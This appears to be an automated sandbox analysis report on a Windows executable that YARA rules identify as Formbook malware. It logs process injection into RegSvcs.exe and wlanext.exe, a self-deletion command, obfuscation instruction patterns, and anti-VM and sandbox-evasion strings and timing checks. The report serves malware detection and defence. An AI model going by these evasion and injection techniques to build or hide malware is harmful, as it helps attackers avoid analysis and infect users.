Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6EF8 0_2_057D6EF8
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6B70 0_2_057D6B70
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057DA608 0_2_057DA608
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D8091 0_2_057D8091
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D8318 0_2_057D8318
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6F50 0_2_057D6F50
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6F95 0_2_057D6F95
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E53C88 0_2_00E53C88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00401026 3_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041BA6D 3_2_0041BA6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00408C4C 3_2_00408C4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00408C50 3_2_00408C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B4B8 3_2_0041B4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00402D87 3_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041C773 3_2_0041C773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041BFFF 3_2_0041BFFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB090 3_2_00FBB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061002 3_2_01061002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107E824 3_2_0107E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010720A8 3_2_010720A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010728EC 3_2_010728EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAF900 3_2_00FAF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01072B28 3_2_01072B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106DBD2 3_2_0106DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010603DA 3_2_010603DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105FA2B 3_2_0105FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDEBB0 3_2_00FDEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010722AE 3_2_010722AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01072D07 3_2_01072D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01071D55 3_2_01071D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010725DD 3_2_010725DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB841F 3_2_00FB841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBD5E0 3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106D466 3_2_0106D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA0D20 3_2_00FA0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107DFCE 3_2_0107DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC6E30 3_2_00FC6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01071FF1 3_2_01071FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106D616 3_2_0106D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01072EF7 3_2_01072EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330C773 7_2_0330C773
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F2FB0 7_2_032F2FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F2D87 7_2_032F2D87
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F2D90 7_2_032F2D90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F8C4C 7_2_032F8C4C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F8C50 7_2_032F8C50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B4B8 7_2_0330B4B8
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FAB150 appears 45 times
Sample file is different than original file name gathered from version info
Source: 00098765123POIIU.exe, 00000000.00000002.337981677.0000000003303000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.339649997.0000000004378000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe Binary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe
Uses 32bit PE files
Source: 00098765123POIIU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00098765123POIIU.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@14/8
Source: C:\Users\user\Desktop\00098765123POIIU.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\00098765123POIIU.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
Source: C:\Users\user\Desktop\00098765123POIIU.exe Mutant created: \Sessions\1\BaseNamedObjects\niuhQPClXbX
Source: C:\Users\user\Desktop\00098765123POIIU.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\00098765123POIIU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: 00098765123POIIU.exe ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\00098765123POIIU.exe File read: C:\Users\user\Desktop\00098765123POIIU.exe:Zone.Identifier
Source: unknown Process created: C:\Users\user\Desktop\00098765123POIIU.exe 'C:\Users\user\Desktop\00098765123POIIU.exe'
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\00098765123POIIU.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 00098765123POIIU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 00098765123POIIU.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00404837 push ebx; retf 3_2_0040483B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041C892 pushfd ; retf 3_2_0041C893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004151E2 push esp; iretd 3_2_004151E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004191B9 push esi; iretd 3_2_004191BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B3F2 push eax; ret 3_2_0041B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B3FB push eax; ret 3_2_0041B462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B3A5 push eax; ret 3_2_0041B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B45C push eax; ret 3_2_0041B462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041C4D4 push esi; ret 3_2_0041C4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00415D14 push ebp; retf 3_2_00415D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00419F79 push ebp; ret 3_2_00419F7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FFD0D1 push ecx; ret 3_2_00FFD0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B3A5 push eax; ret 7_2_0330B3F8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B3F2 push eax; ret 7_2_0330B3F8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B3FB push eax; ret 7_2_0330B462
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033091B9 push esi; iretd 7_2_033091BA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033051E2 push esp; iretd 7_2_033051E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F4837 push ebx; retf 7_2_032F483B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330C892 pushfd ; retf 7_2_0330C893
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03309F79 push ebp; ret 7_2_03309F7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03305D14 push ebp; retf 7_2_03305D19
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B45C push eax; ret 7_2_0330B462
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330C4D4 push esi; ret 7_2_0330C4D8
Source: initial sample Static PE information: section name: .text entropy: 7.9019999335
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 00098765123POIIU.exe PID: 6396, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000032F85E4 second address: 00000000032F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000032F896E second address: 00000000032F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004088A0 rdtsc 3_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6400 Thread sleep time: -103772s >= -30000s
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5988 Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5776 Thread sleep time: -56000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 103772
Source: C:\Users\user\Desktop\00098765123POIIU.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.610911018.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
